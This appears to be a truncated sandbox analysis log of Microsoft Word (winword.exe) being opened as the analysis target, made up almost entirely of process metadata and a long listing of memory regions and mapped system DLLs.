# Flog Txt Version 1 # Analyzer Version: 4.6.0 # Analyzer Build Date: Jul 8 2022 06:26:21 # Log Creation Date: 11.08.2022 17:32:13.387 Process: id = "1" image_name = "winword.exe" filename = "c:\\program files (x86)\\microsoft office\\office16\\winword.exe" page_root = "0x60051000" os_pid = "0x1250" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x7b4" cmd_line = "\"C:\\Program Files (x86)\\Microsoft Office\\Office16\\WINWORD.EXE\" /n" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fa87" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 255 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 256 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 257 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 258 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 259 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 260 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 261 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 262 start_va = 0x1b0000 end_va = 0x1b3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 263 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 264 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 265 start_va = 0x1e0000 end_va = 0x1e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 266 start_va = 0x1f0000 end_va = 0x1f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 267 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 268 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 269 start_va = 0x4c0000 end_va = 0x4c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 270 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 271 start_va = 0x4e0000 end_va = 0x51ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 272 start_va = 0x520000 end_va = 0x520fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 273 start_va = 0x530000 end_va = 0x531fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 274 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 275 start_va = 0x550000 end_va = 0x551fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 276 start_va = 0x560000 end_va = 0x561fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 277 start_va = 0x570000 end_va = 0x571fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 278 start_va = 0x580000 end_va = 0x581fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 279 start_va = 0x590000 end_va = 0x591fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 280 start_va = 0x5a0000 end_va = 0x5a3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 281 start_va = 0x5b0000 end_va = 0x5b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 282 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 283 start_va = 0x6c0000 end_va = 0x7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 284 start_va = 0x7c0000 end_va = 0x7c4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\SysWOW64\\winnlsres.dll" (normalized: "c:\\windows\\syswow64\\winnlsres.dll") Region: id = 285 start_va = 0x7d0000 end_va = 0x7dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\winnlsres.dll.mui") Region: id = 286 start_va = 0x7e0000 end_va = 0x7eefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msointl30.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\1033\\msointl30.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\1033\\msointl30.dll") Region: id = 287 start_va = 0x7f0000 end_va = 0x7f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007f0000" filename = "" Region: id = 288 start_va = 0x800000 end_va = 0x803fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 289 start_va = 0x810000 end_va = 0x82ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000810000" filename = "" Region: id = 290 start_va = 0x830000 end_va = 0x8d8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wwintl.dll" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\1033\\WWINTL.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\1033\\wwintl.dll") Region: id = 291 start_va = 0x8e0000 end_va = 0x8effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008e0000" filename = "" Region: id = 292 start_va = 0x900000 end_va = 0xad7fff monitored = 0 entry_point = 0x901000 region_type = mapped_file name = "winword.exe" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\WINWORD.EXE" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\winword.exe") Region: id = 293 start_va = 0xae0000 end_va = 0xc67fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ae0000" filename = "" Region: id = 294 start_va = 0xc70000 end_va = 0xdf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c70000" filename = "" Region: id = 295 start_va = 0xe00000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e00000" filename = "" Region: id = 296 start_va = 0x2200000 end_va = 0x23b8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "office.odf" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 297 start_va = 0x23c0000 end_va = 0x23fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023c0000" filename = "" Region: id = 298 start_va = 0x2460000 end_va = 0x2460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002460000" filename = "" Region: id = 299 start_va = 0x2470000 end_va = 0x2470fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002470000" filename = "" Region: id = 300 start_va = 0x2500000 end_va = 0x252dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002500000" filename = "" Region: id = 301 start_va = 0x2530000 end_va = 0x253ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002530000" filename = "" Region: id = 302 start_va = 0x2540000 end_va = 0x2847fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mso40uires.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO40UIRES.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\mso40uires.dll") Region: id = 303 start_va = 0x2850000 end_va = 0x3170fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mso99lres.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO99LRES.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\mso99lres.dll") Region: id = 304 start_va = 0x3180000 end_va = 0x7fbefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msores.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSORES.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\msores.dll") Region: id = 305 start_va = 0x7fc0000 end_va = 0x8134fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msointl.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\1033\\MSOINTL.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\1033\\msointl.dll") Region: id = 306 start_va = 0x8140000 end_va = 0x823ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008140000" filename = "" Region: id = 307 start_va = 0x82b0000 end_va = 0x85e6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 308 start_va = 0x85f0000 end_va = 0x862ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000085f0000" filename = "" Region: id = 309 start_va = 0x8630000 end_va = 0x872ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008630000" filename = "" Region: id = 310 start_va = 0x8730000 end_va = 0x8730fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008730000" filename = "" Region: id = 311 start_va = 0x8740000 end_va = 0x877ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008740000" filename = "" Region: id = 312 start_va = 0x8780000 end_va = 0x887ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008780000" filename = "" Region: id = 313 start_va = 0x8880000 end_va = 0x897ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008880000" filename = "" Region: id = 314 start_va = 0x8980000 end_va = 0x8980fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008980000" filename = "" Region: id = 315 start_va = 0x8990000 end_va = 0x8990fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008990000" filename = "" Region: id = 316 start_va = 0x89a0000 end_va = 0x89dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000089a0000" filename = "" Region: id = 317 start_va = 0x89e0000 end_va = 0x8adffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000089e0000" filename = "" Region: id = 318 start_va = 0x8ae0000 end_va = 0x8b1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008ae0000" filename = "" Region: id = 319 start_va = 0x8b20000 end_va = 0x8c1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008b20000" filename = "" Region: id = 320 start_va = 0x8c20000 end_va = 0x8c68fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "~fontcache-system.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-System.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-system.dat") Region: id = 321 start_va = 0x8c70000 end_va = 0x8d6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008c70000" filename = "" Region: id = 322 start_va = 0x8d70000 end_va = 0x956ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "~fontcache-s-1-5-21-1560258661-3990802383-1811730007-1000.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-S-1-5-21-1560258661-3990802383-1811730007-1000.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-s-1-5-21-1560258661-3990802383-1811730007-1000.dat") Region: id = 323 start_va = 0x9570000 end_va = 0x996ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009570000" filename = "" Region: id = 324 start_va = 0x9970000 end_va = 0x9a2bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000009970000" filename = "" Region: id = 325 start_va = 0x9a30000 end_va = 0x9a33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000009a30000" filename = "" Region: id = 326 start_va = 0x9a40000 end_va = 0x9f31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000009a40000" filename = "" Region: id = 327 start_va = 0x9f40000 end_va = 0x9f40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f40000" filename = "" Region: id = 328 start_va = 0x9f50000 end_va = 0x9f50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f50000" filename = "" Region: id = 329 start_va = 0x9f60000 end_va = 0x9f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f60000" filename = "" Region: id = 330 start_va = 0x9fa0000 end_va = 0xa09ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009fa0000" filename = "" Region: id = 331 start_va = 0xa0a0000 end_va = 0xa0a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000a0a0000" filename = "" Region: id = 332 start_va = 0xa0b0000 end_va = 0xa0effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a0b0000" filename = "" Region: id = 333 start_va = 0xa0f0000 end_va = 0xa1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a0f0000" filename = "" Region: id = 334 start_va = 0xa1f0000 end_va = 0xa1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a1f0000" filename = "" Region: id = 335 start_va = 0xa200000 end_va = 0xa23ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a200000" filename = "" Region: id = 336 start_va = 0xa240000 end_va = 0xa243fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000a240000" filename = "" Region: id = 337 start_va = 0xa250000 end_va = 0xa250fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000a250000" filename = "" Region: id = 338 start_va = 0xa260000 end_va = 0xa260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000a260000" filename = "" Region: id = 339 start_va = 0xa270000 end_va = 0xa27ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a270000" filename = "" Region: id = 340 start_va = 0xa280000 end_va = 0xa37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a280000" filename = "" Region: id = 341 start_va = 0xa380000 end_va = 0xa3bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a380000" filename = "" Region: id = 342 start_va = 0xa3c0000 end_va = 0xa3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a3c0000" filename = "" Region: id = 343 start_va = 0xa400000 end_va = 0xa43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a400000" filename = "" Region: id = 344 start_va = 0xa440000 end_va = 0xa44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a440000" filename = "" Region: id = 345 start_va = 0xa450000 end_va = 0xac4ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000a450000" filename = "" Region: id = 346 start_va = 0xac50000 end_va = 0xad4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ac50000" filename = "" Region: id = 347 start_va = 0xad50000 end_va = 0xae4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ad50000" filename = "" Region: id = 348 start_va = 0xae50000 end_va = 0xaf4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ae50000" filename = "" Region: id = 349 start_va = 0xaf50000 end_va = 0xaf8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000af50000" filename = "" Region: id = 350 start_va = 0xaf90000 end_va = 0xb08ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000af90000" filename = "" Region: id = 351 start_va = 0xb090000 end_va = 0xb094fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\user32.dll.mui") Region: id = 352 start_va = 0xb0a0000 end_va = 0xb0a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b0a0000" filename = "" Region: id = 353 start_va = 0xb0b0000 end_va = 0xb2affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b0b0000" filename = "" Region: id = 354 start_va = 0xb2b0000 end_va = 0xb32ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b2b0000" filename = "" Region: id = 355 start_va = 0xb330000 end_va = 0xb330fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msxml6r.dll" filename = "\\Windows\\SysWOW64\\msxml6r.dll" (normalized: "c:\\windows\\syswow64\\msxml6r.dll") Region: id = 356 start_va = 0xb340000 end_va = 0xb353fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000016.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db") Region: id = 357 start_va = 0xb360000 end_va = 0xb360fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b360000" filename = "" Region: id = 358 start_va = 0xb370000 end_va = 0xb44ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 359 start_va = 0xb450000 end_va = 0xb453fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b450000" filename = "" Region: id = 360 start_va = 0xb460000 end_va = 0xb49ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b460000" filename = "" Region: id = 361 start_va = 0xb4a0000 end_va = 0xb4a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b4a0000" filename = "" Region: id = 362 start_va = 0xb4b0000 end_va = 0xb4b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b4b0000" filename = "" Region: id = 363 start_va = 0xb4c0000 end_va = 0xb4cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b4c0000" filename = "" Region: id = 364 start_va = 0xb4d0000 end_va = 0xb4dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b4d0000" filename = "" Region: id = 365 start_va = 0xb4e0000 end_va = 0xb4effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b4e0000" filename = "" Region: id = 366 start_va = 0xb4f0000 end_va = 0xb4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b4f0000" filename = "" Region: id = 367 start_va = 0xb500000 end_va = 0xb5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b500000" filename = "" Region: id = 368 start_va = 0xb740000 end_va = 0xc73ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "~fontcache-fontface.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-FontFace.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-fontface.dat") Region: id = 369 start_va = 0xc740000 end_va = 0xc81efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "segoeui.ttf" filename = "\\Windows\\Fonts\\segoeui.ttf" (normalized: "c:\\windows\\fonts\\segoeui.ttf") Region: id = 370 start_va = 0xc820000 end_va = 0xcc1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c820000" filename = "" Region: id = 371 start_va = 0xcc20000 end_va = 0xcc61fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "d2d1.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\d2d1.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\d2d1.dll.mui") Region: id = 372 start_va = 0xcc70000 end_va = 0xcd45fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cc70000" filename = "" Region: id = 373 start_va = 0xcd50000 end_va = 0xce25fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cd50000" filename = "" Region: id = 374 start_va = 0xce30000 end_va = 0xce4efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000ce30000" filename = "" Region: id = 375 start_va = 0xce50000 end_va = 0xce6efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000ce50000" filename = "" Region: id = 376 start_va = 0xd150000 end_va = 0xd554fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d150000" filename = "" Region: id = 377 start_va = 0xd560000 end_va = 0xd96bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d560000" filename = "" Region: id = 378 start_va = 0xd970000 end_va = 0xdd76fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d970000" filename = "" Region: id = 379 start_va = 0xdd90000 end_va = 0xde0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000dd90000" filename = "" Region: id = 380 start_va = 0xde10000 end_va = 0xde20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1255.nls" filename = "\\Windows\\System32\\C_1255.NLS" (normalized: "c:\\windows\\system32\\c_1255.nls") Region: id = 381 start_va = 0xde30000 end_va = 0xde30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000de30000" filename = "" Region: id = 382 start_va = 0xde40000 end_va = 0xee7ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 383 start_va = 0xee80000 end_va = 0xf35dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000ee80000" filename = "" Region: id = 384 start_va = 0x34400000 end_va = 0x3440ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000034400000" filename = "" Region: id = 385 start_va = 0x64050000 end_va = 0x640c9fff monitored = 0 entry_point = 0x64063290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 386 start_va = 0x640d0000 end_va = 0x6411ffff monitored = 0 entry_point = 0x640e8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 387 start_va = 0x64120000 end_va = 0x64127fff monitored = 0 entry_point = 0x641217c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 388 start_va = 0x69660000 end_va = 0x69682fff monitored = 0 entry_point = 0x696769b0 region_type = mapped_file name = "globinputhost.dll" filename = "\\Windows\\SysWOW64\\globinputhost.dll" (normalized: "c:\\windows\\syswow64\\globinputhost.dll") Region: id = 389 start_va = 0x69690000 end_va = 0x696e1fff monitored = 0 entry_point = 0x696b8290 region_type = mapped_file name = "bcp47langs.dll" filename = "\\Windows\\SysWOW64\\BCP47Langs.dll" (normalized: "c:\\windows\\syswow64\\bcp47langs.dll") Region: id = 390 start_va = 0x696f0000 end_va = 0x69821fff monitored = 0 entry_point = 0x6975bf60 region_type = mapped_file name = "windows.globalization.dll" filename = "\\Windows\\SysWOW64\\Windows.Globalization.dll" (normalized: "c:\\windows\\syswow64\\windows.globalization.dll") Region: id = 391 start_va = 0x69830000 end_va = 0x69845fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 392 start_va = 0x69850000 end_va = 0x69870fff monitored = 0 entry_point = 0x6985bdb0 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\SysWOW64\\cabinet.dll" (normalized: "c:\\windows\\syswow64\\cabinet.dll") Region: id = 393 start_va = 0x69880000 end_va = 0x6a074fff monitored = 0 entry_point = 0x698e5279 region_type = mapped_file name = "chart.dll" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\CHART.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\chart.dll") Region: id = 394 start_va = 0x6a080000 end_va = 0x6a112fff monitored = 0 entry_point = 0x6a0a0ec0 region_type = mapped_file name = "twinapi.dll" filename = "\\Windows\\SysWOW64\\twinapi.dll" (normalized: "c:\\windows\\syswow64\\twinapi.dll") Region: id = 395 start_va = 0x6a120000 end_va = 0x6a30efff monitored = 0 entry_point = 0x6a165e20 region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\SysWOW64\\msxml6.dll" (normalized: "c:\\windows\\syswow64\\msxml6.dll") Region: id = 396 start_va = 0x6a310000 end_va = 0x6a376fff monitored = 0 entry_point = 0x6a325a00 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\SysWOW64\\winspool.drv" (normalized: "c:\\windows\\syswow64\\winspool.drv") Region: id = 397 start_va = 0x6a380000 end_va = 0x6a388fff monitored = 0 entry_point = 0x6a383830 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\SysWOW64\\npmproxy.dll" (normalized: "c:\\windows\\syswow64\\npmproxy.dll") Region: id = 398 start_va = 0x6a390000 end_va = 0x6a3c3fff monitored = 0 entry_point = 0x6a3a8280 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\SysWOW64\\netprofm.dll" (normalized: "c:\\windows\\syswow64\\netprofm.dll") Region: id = 399 start_va = 0x6a3d0000 end_va = 0x6a571fff monitored = 0 entry_point = 0x6a3d1000 region_type = mapped_file name = "riched20.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\RICHED20.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\riched20.dll") Region: id = 400 start_va = 0x6a580000 end_va = 0x6a587fff monitored = 0 entry_point = 0x6a5817b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 401 start_va = 0x6a590000 end_va = 0x6a60cfff monitored = 0 entry_point = 0x6a5a0db0 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll") Region: id = 402 start_va = 0x6a610000 end_va = 0x6a668fff monitored = 0 entry_point = 0x6a620780 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\SysWOW64\\mscoree.dll" (normalized: "c:\\windows\\syswow64\\mscoree.dll") Region: id = 403 start_va = 0x6a670000 end_va = 0x6a6cbfff monitored = 0 entry_point = 0x6a678880 region_type = mapped_file name = "d3d10_1core.dll" filename = "\\Windows\\SysWOW64\\d3d10_1core.dll" (normalized: "c:\\windows\\syswow64\\d3d10_1core.dll") Region: id = 404 start_va = 0x6a6d0000 end_va = 0x6a6fbfff monitored = 0 entry_point = 0x6a6f24b0 region_type = mapped_file name = "d3d10_1.dll" filename = "\\Windows\\SysWOW64\\d3d10_1.dll" (normalized: "c:\\windows\\syswow64\\d3d10_1.dll") Region: id = 405 